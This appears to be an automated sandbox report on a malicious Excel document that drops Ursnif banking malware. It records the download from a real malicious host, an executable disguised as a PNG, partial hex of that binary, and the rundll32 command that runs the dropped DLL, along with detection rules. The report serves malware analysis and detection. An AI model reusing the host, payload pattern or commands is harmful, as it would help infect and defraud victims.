Play interactive tourEdit tour

# Analysis Report http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls

## Overview

### General Information

 Sample URL: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls Analysis ID: 330745 Most interesting Screenshot:

### Detection

Hidden Macro 4.0 Ursnif
 Score: 84 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (process start blacklist hit)
Injects files into Windows application
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64cmd.exe (PID: 6088 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)wget.exe (PID: 5876 cmdline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)EXCEL.EXE (PID: 6840 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)rundll32.exe (PID: 6524 cmdline: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)iexplore.exe (PID: 5868 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 1584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 5412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 5512 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)iexplore.exe (PID: 1500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
• 0x0:$header_docf: D0 CF 11 E0 • 0x4e0f7:$s1: Excel
• 0x505bd:$s1: Excel • 0x50b62:$s1: Excel
• 0x50ec9:$s1: Excel • 0x50f2f:$s1: Excel
• 0x50f48:$s1: Excel • 0x3ad7:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SourceRuleDescriptionAuthorStrings
00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
Click to see the 30 entries

## Sigma Overview

### System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell Show sources
 Source: Process started Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, CommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6840, ProcessCommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, ProcessId: 6524

## Signature Overview

### Software Vulnerabilities:

 Document exploit detected (process start blacklist hit) Show sources
 Allocates a big amount of memory (probably used for heap spraying) Show sources
 Source: excel.exe Memory has grown: Private usage: 1MB later: 115MB

### Networking:

 Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 15 Dec 2020 14:43:00 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 15 Dec 2020 09:56:58 GMT ETag: "7d000-5b67dc7836e80" Accept-Ranges: bytes Content-Length: 512000 Connection: close Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 dd 59 c9 42 bc 37 9a 42 bc 37 9a 42 bc 37 9a 65 7a 4a 9a 57 bc 37 9a 65 7a 59 9a 74 bc 37 9a 65 7a 5a 9a ca bc 37 9a 4b c4 a4 9a 45 bc 37 9a 42 bc 36 9a 29 bc 37 9a 65 7a 45 9a 43 bc 37 9a 65 7a 4d 9a 43 bc 37 9a 65 7a 4b 9a 43 bc 37 9a 65 7a 4f 9a 43 bc 37 9a 52 69 63 68 42 bc 37 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 71 82 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 07 00 00 e0 00 00 00 00 00 00 8e 13 01 00 00 10 00 00 00 70 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 08 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 69 07 00 82 00 00 00 a4 60 07 00 50 00 00 00 00 10 08 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 f4 19 00 00 00 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 59 07 00 00 10 00 00 00 60 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 9d 00 00 00 70 07 00 00 20 00 00 00 70 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 05 00 00 00 10 08 00 00 10 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 29 00 00 00 20 08 00 00 30 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Dec 2020 14:43:00 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Tue, 15 Dec 2020 09:56:58 GMTETag: "7d000-5b67dc7836e80"Accept-Ranges: bytesContent-Length: 512000Connection: closeContent-Type: image/pngData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 dd 59 c9 42 bc 37 9a 42 bc 37 9a 42 bc 37 9a 65 7a 4a 9a 57 bc 37 9a 65 7a 59 9a 74 bc 37 9a 65 7a 5a 9a ca bc 37 9a 4b c4 a4 9a 45 bc 37 9a 42 bc 36 9a 29 bc 37 9a 65 7a 45 9a 43 bc 37 9a 65 7a 4d 9a 43 bc 37 9a 65 7a 4b 9a 43 bc 37 9a 65 7a 4f 9a 43 bc 37 9a 52 69 63 68 42 bc 37 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 71 82 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 07 00 00 e0 00 00 00 00 00 00 8e 13 01 00 00 10 00 00 00 70 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 08 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 69 07 00 82 00 00 00 a4 60 07 00 50 00 00 00 00 10 08 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 f4 19 00 00 00 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 59 07 00 00 10 00 00 00 60 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 9d 00 00 00 70 07 00 00 20 00 00 00 70 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 05 00 00 00 10 08 00 00 10 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 29 00 00 00 20 08 00 00 30 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Source: global traffic HTTP traffic detected: GET /ref-151220-BTC2XU590R2HT8.xls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: snenpinfrresertts.comConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /str.png HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: snenpinfrresertts.comConnection: Keep-Alive
 Found strings which match to known social media urls Show sources
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: snenpinfrresertts.com
 Urls found in memory or binary data Show sources
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772 Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767 Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443

### Key, Mouse, Clipboard, Microphone and Screen Capturing:

 Yara detected Ursnif Show sources
 Source: Yara match File source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

### E-Banking Fraud:

 Yara detected Ursnif Show sources
 Source: Yara match File source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY

### System Summary:

 Office process drops PE file Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\rsfsv\drgd.dbvf Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png Jump to dropped file
 Writes registry values via WMI Show sources
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
 Yara signature match Show sources
 Source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
 Classification label Show sources
 Source: classification engine Classification label: mal84.troj.expl.evad.win@16/46@6/3
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:684:120:WilError_01
 Creates temporary files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{850317AA-8546-462C-B1FE-96E615861FA5} - OProcSessId.dat Jump to behavior
 Queries process information (via WMI, Win32_Process) Show sources
 Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
 Reads the hosts file Show sources
 Runs a DLL by calling functions Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer
 Spawns processes Show sources
 Uses an in-process (OLE) Automation server Show sources
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed Show sources
 Uses new MSVCR Dlls Show sources
 Binary contains paths to debug symbols Show sources
 Source: Binary string: c:\CompanyLast\SideCircle\LawRoad\storyForm\numberEat\smell.pdb source: drgd.dbvf.3.dr
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_05F519A0 push ds; ret 4_3_05F519B1
 Drops PE files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\rsfsv\drgd.dbvf Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png Jump to dropped file
 Drops files with a non-matching file extension (content does not match file extension) Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\rsfsv\drgd.dbvf Jump to dropped file

### Hooking and other Techniques for Hiding and Protection:

 Yara detected Ursnif Show sources
